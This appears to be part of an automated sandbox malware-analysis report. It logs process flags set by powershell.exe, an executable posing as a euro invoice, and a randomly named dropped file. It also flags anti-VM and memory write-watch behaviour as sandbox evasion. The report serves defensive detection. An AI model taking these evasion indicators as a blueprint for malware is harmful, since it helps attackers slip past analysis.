Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: AF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 2800000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 4800000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 7860000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 8860000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 8A20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 9A20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: A060000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: B060000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: C060000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 2DD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 3010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 2E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 29F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 7780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 8780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 8930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 9930000 memory reserve | memory write watch
